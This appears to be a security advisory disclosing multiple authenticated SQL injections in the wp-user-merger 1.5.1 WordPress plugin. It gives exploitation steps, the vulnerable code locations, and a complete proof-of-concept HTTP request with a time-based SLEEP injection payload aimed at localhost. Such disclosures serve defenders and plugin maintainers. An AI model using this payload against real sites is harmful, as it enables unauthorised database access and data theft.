wp-user-merger 1.5.1 (2/3) WordPress plug-in multiple SQL injections

Vulnerability Metadata

Vulnerability Description

The wpsu_user_id query parameter in wp-user-merger 1.5.1 is vulnerable to multiple SQL injections. An authenticated attacker may abuse the action wpsu_get_user_assets of the plugin to craft a malicious POST request.

Exploitation Guide

Login as admin user. This attack requires at least admin privileges.

Add a new post by any user with Contributor role or higher,if it doesn't already exist. We need to have at least one post by any user to pass the check.

Go to the WP User Merger Settings Optional tab. And turn on Make User List Searchable (AJAX Based)

Go to the WP User Merger Settings DB User Merger tab, and select user(with any role) as User1 or User2 as the user having at least one post on the site.

Click the searched user mail/name.

Clicking the searched user mail/name triggers the vulnerable request, wpsu_user_id is the vulnerable query parameter.

A POC may look like the following request:

In the code, the vulnerability is triggered by un-sanitized user input of wpsu_user_id at line 444 in ./inc/functions.php.

At line 446 in ./inc/functions.php the parameter is passed to variable- $q. Subsequently, database query call (line 462) on $q leads to SQL injection.

Another database call with the same parameter wpsu_user_id is made at 482. Resulting another in SQL injection.

Note: As the result of previous query returns True. Parameter wpsu_user_id should have user id of the user who has authored at least one post (wpsu_user_id=13 here).

Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

Since the vulnerable query parameter wpsu_user_id is passed to two database queries, we can notice the sleep time of the request being twice the given argument in SLEEP()(~14,000 milliseconds here as SLEEP(7)).

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/wp-admin/users.php?page=wpus_merger
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 112
Origin: http://localhost
Connection: close
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=newadmin%7C1666399029%7C1ih5qJiaQBpwXVhZYacvp76IZoYUJ5ew8sDa2MXDuCX%7Ca95ca772d1135d69d40dc00fa8bf0b81ff7fd8ab63ed7fee0d720ec7b1a8c464; fileLoading=true; wp-saving-post=61-check; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time-1=1666185599; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AJvHCLMGubXIHcpkh1xN8uHJK; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=newadmin%7C1666399029%7C1ih5qJiaQBpwXVhZYacvp76IZoYUJ5ew8sDa2MXDuCX%7Cdf5ce5dc582b7a1e87077d8950277aafc600224fecff07452b8df9980c52fe01; wp-saving-post=61-saved; wordpress_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666561839%7COb27ssz9yj6ggiVMFvBBxWTl58BVqQpE698EQ6Z9jry%7C85f14d8133695e98d8a3b687271e8db10479cf22ab4c0fc9a854f69b35b95510; wordpress_logged_in_c9db569cb388e160e4b86ca1ddff84d7=newadmin%7C1666561839%7COb27ssz9yj6ggiVMFvBBxWTl58BVqQpE698EQ6Z9jry%7C3574ba8bb8247792712aa901aa6288123e68b04f3f207a2164005b477f9a5bf1; wp-settings-8=libraryContent%3Dbrowse; wp-settings-time-8=1666389039
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=wpsu_get_user_assets&wpsu_user_id=13+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&wpsu_nonce=4afb1e4faa